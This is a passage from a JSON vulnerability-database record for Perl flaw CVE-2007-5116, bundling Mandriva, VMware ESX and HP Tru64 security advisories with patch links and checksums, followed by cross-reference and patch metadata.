2008.0/i586/perl-doc-5.8.8-12.1mdv2008.0.i586.rpm\n 78585fde0ad5b02f3e7c0f01d31a1ccf  2008.0/i586/perl-suid-5.8.8-12.1mdv2008.0.i586.rpm \n 584ad050342c7136e161fc48d29398bf  2008.0/SRPMS/perl-5.8.8-12.1mdv2008.0.src.rpm\n\n Mandriva Linux 2008.0/X86_64:\n 6ee9071cb1b0a6f38e731b1cd9a421e7  2008.0/x86_64/perl-5.8.8-12.1mdv2008.0.x86_64.rpm\n d7bd85fb101d94bf1dc84bcf817533d7  2008.0/x86_64/perl-base-5.8.8-12.1mdv2008.0.x86_64.rpm\n 031487e27d7f2a12003efe8ab714a096  2008.0/x86_64/perl-devel-5.8.8-12.1mdv2008.0.x86_64.rpm\n 3c1846b134cbd1461ffd291a95f6e2d2  2008.0/x86_64/perl-doc-5.8.8-12.1mdv2008.0.x86_64.rpm\n 99f545fefe35f45b5d90d2f98fe14da5  2008.0/x86_64/perl-suid-5.8.8-12.1mdv2008.0.x86_64.rpm \n 584ad050342c7136e161fc48d29398bf  2008.0/SRPMS/perl-5.8.8-12.1mdv2008.0.src.rpm\n\n Corporate 3.0:\n 9388a0766403e1accc6afc3d963960ba  corporate/3.0/i586/perl-5.8.3-5.6.C30mdk.i586.rpm\n a67623fb7d2e4e18ca8976c64e43a4ca  corporate/3.0/i586/perl-base-5.8.3-5.6.C30mdk.i586.rpm\n 9068ad50c3e10c29940bb071651a8d4d  corporate/3.0/i586/perl-devel-5.8.3-5.6.C30mdk.i586.rpm\n a8a2e1b1963c212e4644c320f27c71d3  corporate/3.0/i586/perl-doc-5.8.3-5.6.C30mdk.i586.rpm \n 15b73b73ea6dd0de1100e1445690c034  corporate/3.0/SRPMS/perl-5.8.3-5.6.C30mdk.src.rpm\n\n Corporate 3.0/X86_64:\n f2f7445b49d5d7afa7b3766d71bdf65f  corporate/3.0/x86_64/perl-5.8.3-5.6.C30mdk.x86_64.rpm\n ef5dabb99fdbe28068089eba1fd8bcc4  corporate/3.0/x86_64/perl-base-5.8.3-5.6.C30mdk.x86_64.rpm\n 4a5a04a330db20f460229aa69ded5e95  corporate/3.0/x86_64/perl-devel-5.8.3-5.6.C30mdk.x86_64.rpm\n 2bc06d931706f57fa946822f9396ffd6  corporate/3.0/x86_64/perl-doc-5.8.3-5.6.C30mdk.x86_64.rpm \n 15b73b73ea6dd0de1100e1445690c034  corporate/3.0/SRPMS/perl-5.8.3-5.6.C30mdk.src.rpm\n\n Corporate 4.0:\n e158109794ad5e71bc02f41adec150e1  corporate/4.0/i586/perl-5.8.7-3.3.20060mlcs4.i586.rpm\n 03c680726cf01c3d8f25cb7d61d7bb10  corporate/4.0/i586/perl-base-5.8.7-3.3.20060mlcs4.i586.rpm\n 51f55a3998dbcf2e9abcf821ffb3026f  corporate/4.0/i586/perl-devel-5.8.7-3.3.20060mlcs4.i586.rpm\n f936e8720be0d37223b8a97dc2ed2704  corporate/4.0/i586/perl-doc-5.8.7-3.3.20060mlcs4.i586.rpm\n b4068ddb2d92f4845c29a6b3ca8feef5  corporate/4.0/i586/perl-suid-5.8.7-3.3.20060mlcs4.i586.rpm \n 3b23f4612d0a011d50c5eb6960ffa5c4  corporate/4.0/SRPMS/perl-5.8.7-3.3.20060mlcs4.src.rpm\n\n Corporate 4.0/X86_64:\n c42250a8c42a0e349102ff977c6659cc  corporate/4.0/x86_64/perl-5.8.7-3.3.20060mlcs4.x86_64.rpm\n 82d2bcbda0229415464c10471f881517  corporate/4.0/x86_64/perl-base-5.8.7-3.3.20060mlcs4.x86_64.rpm\n 7f07eddd92d4c49b3ee5c32c69d52996  corporate/4.0/x86_64/perl-devel-5.8.7-3.3.20060mlcs4.x86_64.rpm\n 140b57c79fc305a52e13ce5550e7d05c  corporate/4.0/x86_64/perl-doc-5.8.7-3.3.20060mlcs4.x86_64.rpm\n ec3007ca202716e0c3872c37141fc2cc  corporate/4.0/x86_64/perl-suid-5.8.7-3.3.20060mlcs4.x86_64.rpm \n 3b23f4612d0a011d50c5eb6960ffa5c4  corporate/4.0/SRPMS/perl-5.8.7-3.3.20060mlcs4.src.rpm\n\n Multi Network Firewall 2.0:\n 8ea5d389e9ddd9ca2e1b78869ad14ca7  mnf/2.0/i586/perl-5.8.3-5.6.M20mdk.i586.rpm\n f53bd974980010568e5153578d628323  mnf/2.0/i586/perl-base-5.8.3-5.6.M20mdk.i586.rpm\n 1335c295512b38ea524e201c66551132  mnf/2.0/i586/perl-devel-5.8.3-5.6.M20mdk.i586.rpm\n 8e306b59ecbb8583d5c1e4e74ef62e34  mnf/2.0/i586/perl-doc-5.8.3-5.6.M20mdk.i586.rpm \n 7576ea8ec817978b4602f5bf4c3436c5  mnf/2.0/SRPMS/perl-5.8.3-5.6.M20mdk.src.rpm\n _______________________________________________________________________\n\n To upgrade automatically use MandrivaUpdate or urpmi.  The verification\n of md5 checksums and GPG signatures is performed automatically for you. \n\n All packages are signed by Mandriva for security.  You can obtain the\n GPG public key of the Mandriva Security Team by executing:\n\n  gpg --recv-keys --keyserver pgp.mit.edu 0x22458A98\n\n You can view other update advisories for Mandriva Linux at:\n\n  http://www.mandriva.com/security/advisories\n\n If you want to report vulnerabilities, please contact\n\n  security_(at)_mandriva.com\n _______________________________________________________________________\n\n Type Bits/KeyID     Date       User ID\n pub  1024D/22458A98 2000-07-10 Mandriva Security Team\n  \u003csecurity*mandriva.com\u003e\n-----BEGIN PGP SIGNATURE-----\nVersion: GnuPG v1.4.7 (GNU/Linux)\n\niD8DBQFHL9FBmqjQ0CJFipgRAhxaAJ44oWRrf/Q1Zj9q+HP4Y3pj9Y8XugCg398H\nRl9c0TwvCe/HjAyI42+NhlU=\n=o1R+\n-----END PGP SIGNATURE-----\n\n_______________________________________________\nFull-Disclosure - We believe in it. \nCharter: http://lists.grok.org.uk/full-disclosure-charter.html\nHosted and sponsored by Secunia - http://secunia.com/\n. -----BEGIN PGP SIGNED MESSAGE-----\nHash: SHA256\n\n- -------------------------------------------------------------------\n                   VMware Security Advisory\n\nAdvisory ID:       VMSA-2008-0001.1\nSynopsis:          Moderate OpenPegasus PAM Authentication Buffer\n                   Overflow and updated service console packages\nIssue date:        2008-01-07\nUpdated on:        2008-01-22\nCVE numbers:       CVE-2007-5360 CVE-2007-5398 CVE-2007-4572\n                   CVE-2007-5191 CVE-2007-5116 CVE-2007-3108\n                   CVE-2007-5135\n- -------------------------------------------------------------------\n\n1. Summary:\n\nUpdated service console patches\n\n2. Relevant releases:\n\nESX Server 3.5 without patches ESX350-200712402-SG, ESX350-200712403-SG,\nESX350-200712404-SG\n\nESX Server 3.0.2 without patches ESX-1002969, ESX-1002970, ESX-1002971,\nESX-1002975, ESX-1002976\n\nESX Server 3.0.1 without patches ESX-1002962, ESX-1002963, ESX-1002964,\nESX-1002968, ESX-1002972, ESX-1003176\n\nESX Server 2.5.5 before Upgrade Patch 3\nESX Server 2.5.5 before Upgrade Patch 14\n\n3. Problem description:\n\n I   Service Console package security updates\n\n   a. OpenPegasus PAM Authentication Buffer Overflow\n\n   Alexander Sotirov from VMware Security Research discovered a\n   buffer overflow vulnerability in the OpenPegasus Management server. \n   This flaw could be exploited by a malicious remote user on the\n   service console network to gain root access to the service console. \n\n   The Common Vulnerabilities and Exposures project (cve.mitre.org)\n   has assigned the name CVE-2007-5360 to this issue. \n\n   RPM Updated: pegasus-2.5-552927\n   VM Shutdown: No\n   Host Reboot: No\n\n   Note: ESX Server 3.5 and ESX Server 3i are not affected by this\n         issue. \n\n   ESX Server 3.0.2\n   http://download3.vmware.com/software/vi/ESX-1002970.tgz\n   md5sum: d19115e965d486e72100ce489efea707\n   http://kb.vmware.com/kb/1002970\n\n   ESX Server 3.0.1\n   http://download3.vmware.com/software/vi/ESX-1003176.tgz\n   md5sum: 5674ca0dcfac90726014cc316444996e\n   http://kb.vmware.com/kb/1003176\n\n   ESX Server 2.5.x\n\n   Users should remove the OpenPegasus CIM Management rpm.  This\n   component is disabled by default, and VMware recommends that you\n   do not use this component of ESX Server 2.x.  If you want to\n   use the CIM functionality, upgrade to ESX Server 3.0.1 or a later\n   release. \n\n   Note: This vulnerability can be exploited remotely only if the\n         attacker has access to the service console network. \n\n         Security best practices provided by VMware recommend that the\n         service console be isolated from the VM network. Please see\n         http://www.vmware.com/resources/techresources/726 for more\n         information on VMware security best practices. \n\n\n   b.   Updated Samba package\n\n        An issue where attackers on the service console management\n        network can cause a stack-based buffer overflow in the\n        reply_netbios_packet function of nmbd in Samba. On systems\n        where Samba is being used as a WINS server, exploiting this\n        vulnerability can allow remote attackers to execute arbitrary\n        code via crafted WINS Name Registration requests followed by a\n        WINS Name Query request. \n\n        An issue where attackers on the service console management\n        network can exploit a vulnerability that occurs when Samba is\n        configured as a Primary or Backup Domain controller. The\n        vulnerability allows remote attackers to have an unknown impact\n        via crafted GETDC mailslot requests, related to handling of\n        GETDC logon server requests. \n\n        The Common Vulnerabilities and Exposures project (cve.mitre.org)\n        has assigned the names CVE-2007-5398 and CVE-2007-4572 to these\n        issues. \n\n  Note: By default Samba is not configured as a WINS server or a domain\n        controller and ESX is not vulnerable unless the administrator\n        has changed the default configuration. \n\n        This vulnerability can be exploited remotely only if the\n        attacker has access to the service console network. \n\n        Security best practices provided by VMware recommend that the\n        service console be isolated from the VM network. Please see\n        http://www.vmware.com/resources/techresources/726 for more\n        information on VMware security best practices. \n\n        RPM Updated:\n        samba-3.0.9-1.3E.14.1vmw\n        samba-client-3.0.9-1.3E.14.1vmw\n        samba-common-3.0.9-1.3E.14.1vmw\n\n        VM Shutdown: Yes\n        Host Reboot: Yes\n\n        ESX Server 3.5.0\n        http://download3.vmware.com/software/vi/ESX350-200712402-SG\n        md5sum: d83eeef80e27b739546915bc17390ac0\n        http://kb.vmware.com/kb/1003204\n\n        ESX Server 3.0.2\n        http://download3.vmware.com/software/vi/ESX-1002975.tgz\n        md5sum: 797a7494c2c4eb49629d3f94818df5dd\n        http://kb.vmware.com/kb/1002975\n\n        ESX Server 3.0.1\n        http://download3.vmware.com/software/vi/ESX-1002968.tgz\n        md5sum: 5106d90afaf77c3a0d8433487f937d06\n        http://kb.vmware.com/kb/1002968\n\n        ESX Server 2.5.5 download Upgrade Patch 3\n        ESX Server 2.5.4 download Upgrade Patch 14\n\n   c.   Updated util-linux package\n\n        The patch addresses an issue where the mount and umount\n        utilities in util-linux call the setuid and setgid functions in\n        the wrong order and do not check the return values, which could\n        allow attackers to gain elevated privileges via helper\n        application such as mount.nfs. \n\n        The Common Vulnerabilities and Exposures project (cve.mitre.org)\n        has assigned the name CVE-2007-5191 to this issue. \n\n        RPM Updated:\n        util-linux-2.11y-31.24vmw\n        losetup-2.11y-31.24vmw\n        mount -2.11y-31.24vmw\n\n        VM Shutdown: Yes\n        Host Reboot: Yes\n\n        ESX Server 3.5\n        http://download3.vmware.com/software/vi/ESX350-200712403-SG.zip\n        md5sum: 0656cc3da5a92b22a337ad27ae6f8a6b\n        http://kb.vmware.com/kb/1003205\n\n        ESX Server 3.0.2\n        http://download3.vmware.com/software/vi/ESX-1002976.tgz\n        md5sum: 0fe833c50c0ecb0ff9340d6674be2e43\n        http://kb.vmware.com/kb/1002976\n\n        ESX Server 3.0.1\n        http://download3.vmware.com/software/vi/ESX-1002972.tgz\n        md5sum: 59ca4a43f330c5f0b7a55693aa952cdc\n        http://kb.vmware.com/kb/1002972\n\n\n   d. \n\n        The Common Vulnerabilities and Exposures project (cve.mitre.org)\n        has assigned the name CVE-2007-5116 to this issue. \n\n        RPM Updated:\n        perl-5.8.0-97.EL3\n\n        VM Shutdown: Yes\n        Host Reboot: Yes\n\n        ESX Server 3.5\n        http://download3.vmware.com/software/vi/ESX350-200712404-SG.zip\n        md5sum: 8f75050d73289cdf74563fa7e494d935\n        http://kb.vmware.com/kb/1003206\n\n        ESX Server 3.0.2\n        http://download3.vmware.com/software/vi/ESX-1002971.tgz\n        md5sum: 337b09d9ae4b1694a045e216b69765e1\n        http://kb.vmware.com/kb/1002971\n\n        ESX Server 3.0.1\n        http://download3.vmware.com/software/vi/ESX-1002964.tgz\n        md5sum: d47e26104bfd5e4018ae645638c94487\n        http://kb.vmware.com/kb/1002964\n\n\n   e.   Updated OpenSSL package\n\n        A flaw in the SSL_get_shared_ciphers() function could allow an\n        attacker to cause a buffer overflow problem by sending ciphers\n        to applications that use the function. \n\n        The Common Vulnerabilities and Exposures project (cve.mitre.org)\n        has assigned the names CVE-2007-3108, and CVE-2007-5135 to these\n        issues. \n\n        RPM Updated:\n        openssl-0.9.7a-33.24\n\n        VM Shutdown: Yes\n        Host Reboot: Yes\n\n        ESX Server 3.5\n        http://download3.vmware.com/software/vi/ESX350-200712405-SG.zip\n        md5sum: 3d0fbea4320e8e424388d4bdc54e40c3\n        http://kb.vmware.com/kb/1003208\n\n        ESX Server 3.0.2\n        http://download3.vmware.com/software/vi/ESX-1002969.tgz\n        md5sum: 72fd28a9f9380158db149259fbdcaa3b\n        http://kb.vmware.com/kb/1002969\n\n        ESX Server 3.0.1\n        http://download3.vmware.com/software/vi/ESX-1002962.tgz\n        md5sum: a0727bdc2e1a6f00d5fe77430a6ee9d6\n        http://kb.vmware.com/kb/1002962\n\n        ESX Server 2.5.5 download Upgrade Patch 3\n        ESX Server 2.5.4 download Upgrade Patch 14\n\n4. Solution:\n\nPlease review the Patch notes for your product and version and verify\nthe md5sum of your downloaded file. \n\n   ESX Server 3.5 Patches:\n   http://www.vmware.com/download/vi/vi3_patches_35.html\n\n   ESX Server 3.0.x Patches:\n   http://www.vmware.com/download/vi/vi3_patches.html\n\n   ESX Server 2.x Patches:\n   http://www.vmware.com/download/esx/esx2_patches.html\n\n   ESX Server 2.5.5 Upgrade Patch 3\n   http://download3.vmware.com/software/esx/esx-2.5.5-65742-upgrade.tar.gz\n   md5sum: 9068250fdd604e8787ef40995a4638f9\n   http://www.vmware.com/support/esx25/doc/esx-255-200712-patch.html\n\n   ESX Server 2.5.4 Upgrade Patch 14\n   http://download3.vmware.com/software/esx/esx-2.5.4-65752-upgrade.tar.gz\n   md5sum: 24990b9207f882ccc91545b6fc90273d\n   http://www.vmware.com/support/esx25/doc/esx-254-200712-patch.html\n\n5. References:\n\n  CVE numbers\n  http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-5360\n  http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-5398\n  http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-4572\n  http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-5191\n  http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-5116\n  http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-3108\n  http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-5135\n\n- -------------------------------------------------------------------\n6. Contact:\n\nE-mail list for product security notifications and announcements:\nhttp://lists.vmware.com/cgi-bin/mailman/listinfo/security-announce\n\nThis Security Advisory is posted to the following lists:\n\n  * security-announce@lists.vmware.com\n  * bugtraq@securityfocus.com\n  * full-disclosure@lists.grok.org.uk\n\nE-mail:  security@vmware.com\n\nSecurity web site\nhttp://www.vmware.com/security\n\nVMware security response policy\nhttp://www.vmware.com/support/policies/security_response.html\n\nGeneral support life cycle policy\nhttp://www.vmware.com/support/policies/eos.html\n\nVMware Infrastructure support life cycle policy\nhttp://www.vmware.com/support/policies/eos_vi.html\n\nCopyright 2008 VMware Inc. All rights reserved. \n\n-----BEGIN PGP SIGNATURE-----\nVersion: GnuPG v1.4.7 (GNU/Linux)\n\niD8DBQFHlpPmS2KysvBH1xkRCKt4AJ98f+Dok7eN7gYOvbk/mGCNAbFJTACfVpzi\n9QQld6Krd0JgyS2wHGHVF6E=\n=0DZG\n-----END PGP SIGNATURE-----\n. -----BEGIN PGP SIGNED MESSAGE-----\nHash: SHA1\n\nSUPPORT COMMUNICATION - SECURITY BULLETIN\n\nDocument ID: c01362465\nVersion: 1\n\nHPSBTU02311 SSRT080001 rev.1 - HP Tru64 UNIX running Perl, Remote Execution of Arbitrary Code\n\nNOTICE: The information in this Security Bulletin should be acted upon as soon as possible. \n\nRelease Date: 2008-02-19\nLast Updated: 2008-02-19\n\nPotential Security Impact: Execution of Arbitrary Code\n\nSource: Hewlett-Packard Company, HP Software Security Response Team\n\nVULNERABILITY SUMMARY\nA potential security vulnerability has been identified in Perl 5.8.7 and earlier running on HP Tru64 UNIX. \n\nReferences: CVE-2007-5116 \n\nSUPPORTED SOFTWARE VERSIONS*: ONLY impacted versions are listed. \n\nHP Tru64 UNIX v 5.1B-4 \nHP Tru64 UNIX v 5.1B-3 \nInternet Express (IX) for HP Tru64 UNIX v 6.7 \n\nBACKGROUND\n\nCVSS 2.0 Base Metrics \n\nReference          Base Vector                           Base Score \nCVE-2007-5116  (AV:N/AC:L/Au:N/C:C/I:C/A:C)  10.0\n \nInformation on CVSS is documented in HP Customer Notice: HPSN-2008-002. \n\n\nRESOLUTION\nHP is releasing the following Early Release Patch (ERP) kits publicly for use by any customer until updates are available in mainstream release patch kits. \n\nThe resolutions contained in the ERP kits are targeted for availability in the following mainstream kits: \n\nThe Associated Products CD (APCD) associated with HP Tru64 UNIX v 5.1B-5 \nInternet Express (IX) for HP Tru64 UNIX v 6.8 \n\nThe ERP kits use dupatch to install and will not install over any Customer Specific Patches (CSPs) that have file intersections with the ERPs. Contact your service provider for assistance if the installation of the ERPs is blocked by any of your installed CSPs. \n\nThe ERP kits distribute the following items:\n\nPatched version of Perl v 5.8.8 including source code\n\nHP Tru64 UNIX Version v5.1B-4 \nPREREQUISITE: HP Tru64 UNIX v5.1B-4 PK6 (BL27) \nName: perl_V51BB27-ES-20080207 \nLocation: http://www.itrc.hp.com/service/patch/patchDetail.do?patchid=perl_V51BB27-ES-20080207 \n \nHP Tru64 UNIX Version v5.1B-3 \nPREREQUISITE: HP Tru64 UNIX v5.1B-3 PK5 (BL26) \nName: perl_V51BB26-ES-20080204 \nLocation: http://www.itrc.hp.com/service/patch/patchDetail.do?patchid=T64KIT1001399-V51BB26-ES-20071207 \n \nInternet Express (IX) for HP Tru64 UNIX v 6.7 \nPREREQUISITE: HP Tru64 UNIX v5.1B-3 PK5 (BL26) or HP Tru64 UNIX v5.1B-3 PK5 (BL26) \nNOTE: Use the Perl patch kit appropriate to the operating system version \n \n\n\nMD5 checksums are available from the ITRC patch database main page. From the patch database main page, click Tru64 UNIX, then click verifying MD5 checksums under useful links. \n\nPRODUCT SPECIFIC INFORMATION \n\nHISTORY \nVersion:1 (rev.1) - 19 February 2008 Initial release \n\nThird Party Security Patches: Third party security patches which are to be installed on systems running HP software products should be applied in accordance with the customer\u0027s patch management policy. \n\nSupport: For further information, contact normal HP Services support channel. \n\nReport: To report a potential security vulnerability with any HP supported product, send Email to: security-alert@hp.com \nIt is strongly recommended that security related information being communicated to HP be encrypted using PGP, especially exploit information. \nTo get the security-alert PGP key, please send an e-mail message as follows:\n  To: security-alert@hp.com \n  Subject: get key\n\nSubscribe: To initiate a subscription to receive future HP Security Bulletins via Email: \nhttp://h30046.www3.hp.com/driverAlertProfile.php?regioncode=NA\u0026langcode=USENG\u0026jumpid=in_SC-GEN__driverITRC\u0026topiccode=ITRC \nOn the web page: ITRC security bulletins and patch sign-up \nUnder Step1: your ITRC security bulletins and patches \n  - check ALL categories for which alerts are required and continue. \nUnder Step2: your ITRC operating systems \n  - verify your operating system selections are checked and save. \n\n\nTo update an existing subscription: http://h30046.www3.hp.com/subSignIn.php \nLog in on the web page: Subscriber\u0027s choice for Business: sign-in. \nOn the web page: Subscriber\u0027s Choice: your profile summary - use Edit Profile to update appropriate sections. \n\n\nTo review previously published Security Bulletins visit: http://www.itrc.hp.com/service/cki/secBullArchive.do \n\n\n* The Software Product Category that this Security Bulletin relates to is represented by the 5th and 6th characters of the Bulletin number in the title: \n\nGN = HP General SW\nMA = HP Management Agents\nMI = Misc. 3rd Party SW\nMP = HP MPE/iX\nNS = HP NonStop Servers\nOV = HP OpenVMS\nPI = HP Printing \u0026 Imaging\nST = HP Storage SW\nTL = HP Trusted Linux \nTU = HP Tru64 UNIX\nUX = HP-UX\nVV = HP VirtualVault\n \n\nSystem management and security procedures must be reviewed frequently to maintain system integrity. HP is continually reviewing and enhancing the security features of software products to provide customers with current secure solutions. \n\n\n\"HP is broadly distributing this Security Bulletin in order to bring to the attention of users of the affected HP products the important security information contained in this Bulletin. HP recommends that all users determine the applicability of this information to their individual situations and take appropriate action. HP does not warrant that this information is necessarily accurate or complete for all user situations and, consequently, HP will not be responsible for any damages resulting from user\u0027s use or disregard of the information provided in this Bulletin. To the extent permitted by law, HP disclaims all warranties, either express or implied, including the warranties of merchantability and fitness for a particular purpose, title and non-infringement.\"\n\n\\xa9Copyright 2008 Hewlett-Packard Development Company, L.P. \n\nHewlett-Packard Company shall not be liable for technical or editorial errors or omissions contained herein. The information provided is provided \"as is\" without warranty of any kind. To the extent permitted by law, neither HP or its affiliates, subcontractors or suppliers will be liable for incidental, special or consequential damages including downtime cost; lost profits; damages relating to the procurement of substitute products or services; or damages for loss of data, or software restoration. The information in this document is subject to change without notice. Hewlett-Packard Company and the names of Hewlett-Packard products referenced herein are trademarks of Hewlett-Packard Company in the United States and other countries. Other product and company names mentioned herein may be trademarks of their respective owners",
        "sources": [
          {
            "db": "NVD",
            "id": "CVE-2007-5116"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2007-000796"
          },
          {
            "db": "BID",
            "id": "26350"
          },
          {
            "db": "VULHUB",
            "id": "VHN-28478"
          },
          {
            "db": "PACKETSTORM",
            "id": "60738"
          },
          {
            "db": "PACKETSTORM",
            "id": "60792"
          },
          {
            "db": "PACKETSTORM",
            "id": "61507"
          },
          {
            "db": "PACKETSTORM",
            "id": "129524"
          },
          {
            "db": "PACKETSTORM",
            "id": "60703"
          },
          {
            "db": "PACKETSTORM",
            "id": "62911"
          },
          {
            "db": "PACKETSTORM",
            "id": "63867"
          }
        ],
        "trust": 2.61
      },
      "exploit_availability": {
        "_id": null,
        "data": [
          {
            "reference": "https://www.scap.org.cn/vuln/vhn-28478",
            "trust": 0.1,
            "type": "unknown"
          }
        ],
        "sources": [
          {
            "db": "VULHUB",
            "id": "VHN-28478"
          }
        ]
      },
      "external_ids": {
        "_id": null,
        "data": [
          {
            "db": "NVD",
            "id": "CVE-2007-5116",
            "trust": 3.5
          },
          {
            "db": "BID",
            "id": "26350",
            "trust": 2.8
          },
          {
            "db": "SECUNIA",
            "id": "27546",
            "trust": 2.5
          },
          {
            "db": "SECUNIA",
            "id": "27531",
            "trust": 1.7
          },
          {
            "db": "SECUNIA",
            "id": "27479",
            "trust": 1.7
          },
          {
            "db": "SECUNIA",
            "id": "27515",
            "trust": 1.7
          },
          {
            "db": "SECUNIA",
            "id": "28387",
            "trust": 1.7
          },
          {
            "db": "SECUNIA",
            "id": "27936",
            "trust": 1.7
          },
          {
            "db": "SECUNIA",
            "id": "27548",
            "trust": 1.7
          },
          {
            "db": "SECUNIA",
            "id": "28167",
            "trust": 1.7
          },
          {
            "db": "SECUNIA",
            "id": "28368",
            "trust": 1.7
          },
          {
            "db": "SECUNIA",
            "id": "27756",
            "trust": 1.7
          },
          {
            "db": "SECUNIA",
            "id": "31208",
            "trust": 1.7
          },
          {
            "db": "SECUNIA",
            "id": "27570",
            "trust": 1.7
          },
          {
            "db": "SECUNIA",
            "id": "27613",
            "trust": 1.7
          },
          {
            "db": "VUPEN",
            "id": "ADV-2007-3724",
            "trust": 1.7
          },
          {
            "db": "VUPEN",
            "id": "ADV-2007-4238",
            "trust": 1.7
          },
          {
            "db": "VUPEN",
            "id": "ADV-2007-4255",
            "trust": 1.7
          },
          {
            "db": "SECTRACK",
            "id": "1018899",
            "trust": 1.7
          },
          {
            "db": "USCERT",
            "id": "TA07-352A",
            "trust": 1.7
          },
          {
            "db": "XF",
            "id": "38270",
            "trust": 1.4
          },
          {
            "db": "SECUNIA",
            "id": "29074",
            "trust": 1.1
          },
          {
            "db": "SECUNIA",
            "id": "28993",
            "trust": 1.1
          },
          {
            "db": "VUPEN",
            "id": "ADV-2008-0641",
            "trust": 1.1
          },
          {
            "db": "VUPEN",
            "id": "ADV-2008-0064",
            "trust": 1.1
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2007-000796",
            "trust": 0.8
          },
          {
            "db": "CONFIRM",
            "id": "HTTP://DOCS.INFO.APPLE.COM/ARTICLE.HTML?ARTNUM=307179",
            "trust": 0.6
          },
          {
            "db": "CONFIRM",
            "id": "FTP://AIX.SOFTW",
            "trust": 0.6
          },
          {
            "db": "AIXAPAR",
            "id": "IZ10220",
            "trust": 0.6
          },
          {
            "db": "AIXAPAR",
            "id": "IZ10244",
            "trust": 0.6
          },
          {
            "db": "APPLE",
            "id": "APPLE-SA-2007-12-17",
            "trust": 0.6
          },
          {
            "db": "BUGTRAQ",
            "id": "20080123 UPDATED VMSA-2008-0001.1 MODERATE OPENPEGASUS PAM AUTHENTICATION BUFFER OVERFLOW AND UPDATED SERVICE CONSOLE PACKAGES",
            "trust": 0.6
          },
          {
            "db": "BUGTRAQ",
            "id": "20080108 VMSA-2008-0001 MODERATE OPENPEGASUS PAM AUTHENTICATION BUFFER OVERFLOW AND UPDATED SERVICE CONSOLE PACKAGES",
            "trust": 0.6
          },
          {
            "db": "BUGTRAQ",
            "id": "20071112 FLEA-2007-0069-1 PERL",
            "trust": 0.6
          },
          {
            "db": "BUGTRAQ",
            "id": "20071110 FLEA-2007-0063-1 PERL",
            "trust": 0.6
          },
          {
            "db": "MANDRIVA",
            "id": "MDKSA-2007:207",
            "trust": 0.6
          },
          {
            "db": "GENTOO",
            "id": "GLSA-200711-28",
            "trust": 0.6
          },
          {
            "db": "DEBIAN",
            "id": "DSA-1400",
            "trust": 0.6
          },
          {
            "db": "MLIST",
            "id": "[SECURITY-ANNOUNCE] 20080107 VMSA-2008-0001 MODERATE OPENPEGASUS PAM AUTHENTICATION BUFFER OVERFLOW AND UPDATED SERVICE CONSOLE PACKAGES",
            "trust": 0.6
          },
          {
            "db": "REDHAT",
            "id": "RHSA-2007:0966",
            "trust": 0.6
          },
          {
            "db": "REDHAT",
            "id": "RHSA-2007:1011",
            "trust": 0.6
          },
          {
            "db": "SUSE",
            "id": "SUSE-SR:2007:024",
            "trust": 0.6
          },
          {
            "db": "UBUNTU",
            "id": "USN-552-1",
            "trust": 0.6
          },
          {
            "db": "CERT/CC",
            "id": "TA07-352A",
            "trust": 0.6
          },
          {
            "db": "OPENPKG",
            "id": "OPENPKG-SA-2007.023",
            "trust": 0.6
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-200711-104",
            "trust": 0.6
          },
          {
            "db": "PACKETSTORM",
            "id": "61507",
            "trust": 0.2
          },
          {
            "db": "PACKETSTORM",
            "id": "63867",
            "trust": 0.2
          },
          {
            "db": "PACKETSTORM",
            "id": "60738",
            "trust": 0.2
          },
          {
            "db": "PACKETSTORM",
            "id": "60792",
            "trust": 0.2
          },
          {
            "db": "PACKETSTORM",
            "id": "60703",
            "trust": 0.2
          },
          {
            "db": "PACKETSTORM",
            "id": "61151",
            "trust": 0.1
          },
          {
            "db": "VULHUB",
            "id": "VHN-28478",
            "trust": 0.1
          },
          {
            "db": "PACKETSTORM",
            "id": "129524",
            "trust": 0.1
          },
          {
            "db": "PACKETSTORM",
            "id": "62911",
            "trust": 0.1
          }
        ],
        "sources": [
          {
            "db": "VULHUB",
            "id": "VHN-28478"
          },
          {
            "db": "BID",
            "id": "26350"
          },
          {
            "db": "PACKETSTORM",
            "id": "60738"
          },
          {
            "db": "PACKETSTORM",
            "id": "60792"
          },
          {
            "db": "PACKETSTORM",
            "id": "61507"
          },
          {
            "db": "PACKETSTORM",
            "id": "129524"
          },
          {
            "db": "PACKETSTORM",
            "id": "60703"
          },
          {
            "db": "PACKETSTORM",
            "id": "62911"
          },
          {
            "db": "PACKETSTORM",
            "id": "63867"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-200711-104"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2007-000796"
          },
          {
            "db": "NVD",
            "id": "CVE-2007-5116"
          }
        ]
      },
      "id": "VAR-200711-0540",
      "iot": {
        "_id": null,
        "data": true,
        "sources": [
          {
            "db": "VULHUB",
            "id": "VHN-28478"
          }
        ],
        "trust": 0.01
      },
      "last_update_date": "2026-03-09T21:22:27.593000Z",
      "patch": {
        "_id": null,
        "data": [
          {
            "title": "Security Update 2007-009",
            "trust": 0.8,
            "url": "http://docs.info.apple.com/article.html?artnum=307179-en"
          },
          {
            "title": "Security Update 2007-009",
            "trust": 0.8,
            "url": "http://docs.info.apple.com/article.html?artnum=307179-ja"
          },
          {
            "title": "perl-5.8.8-10.2.1AX",
            "trust": 0.8,
            "url": "https://tsn.miraclelinux.com/tsn_local/index.php?m=errata\u0026a=detail\u0026eid=74"
          },
          {
            "title": "perl_ifix.tar",
            "trust": 0.8,
            "url": "ftp://aix.software.ibm.com/aix/efixes/security/perl_ifix.tar"
          },
          {
            "title": "4170",
            "trust": 0.8,
            "url": "http://www14.software.ibm.com/webapp/set2/subscriptions/pqvcmjd?mode=18\u0026ID=4170"
          },
          {
            "title": "IZ10244",
            "trust": 0.8,
            "url": "http://www-1.ibm.com/support/docview.wss?uid=isg1IZ10244"
          },
          {
            "title": "perl (V3.0/V4.0)",
            "trust": 0.8,
            "url": "http://www.miraclelinux.com/support/update/list.php?errata_id=1178"
          },
          {
            "title": "RHSA-2007:1011",
            "trust": 0.8,
            "url": "http://rhn.redhat.com/errata/RHSA-2007-1011.html"
          },
          {
            "title": "RHSA-2007:0966",
            "trust": 0.8,
